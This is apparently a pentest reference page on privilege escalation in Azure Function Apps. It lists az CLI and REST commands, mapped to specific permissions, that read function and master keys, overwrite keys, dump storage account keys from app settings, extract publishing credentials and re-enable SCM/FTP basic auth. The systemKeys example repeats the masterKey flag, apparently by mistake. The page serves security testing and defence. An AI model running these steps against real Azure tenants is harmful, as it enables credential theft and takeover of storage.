Az - Functions App Privesc

Function Apps

Check the following page for more information:

Microsoft.Web/sites/host/listkeys/action

This permission allows to list the function, master and system keys, but not the host one, of the specified function with:

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

This permission allows to get the host key, of the specified function with:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

This permission allows to create/update a function key to the specified function with:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

This permission allows to create/update a master key to the specified function with:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

This permission allows to create/update a system function key to the specified function with:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

This permission allows to get the environmental variables of a function. Inside these variables it might be possible to find the default env variables AzureWebJobsStorage or WEBSITE_CONTENTAZUREFILECONNECTIONSTRING which actually contains an account key to access the blob storage of the function with FULL permissions.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

This permissions allows to list all the publishing profiles which basically contains basic auth credentials:

# Gte creds
az functionapp deployment list-publishing-profiles \
    --name basicauthenabled \
    --resource-group Resource_Group_1 \
    --output json

• Method SCM

Then, you can access with these basic auth credentials to the SCM URL of your function app and get the values of the env variables:

# Get env variables values
curl -u '<username>:<password>' \
    https://<app-name>.scm.azurewebsites.net/api/settings -v

Note that the SCM username is usually the char "$" followed by the name of the app, so: $<app-name>.

And these env variables contains the AccountKey of the storage account storing the data of the function app, allowing to control that storage account.

If you see that those credentials are REDACTED, it's because you need to enable the SCM basic authentication option and for that you need the second permission (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
    --body '{
        "properties": {
            "allow": true
        }
    }'

# Enable basic authentication for FTP
az rest --method PUT \
    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
    --body '{
        "properties": {
            "allow": true
        }
    }'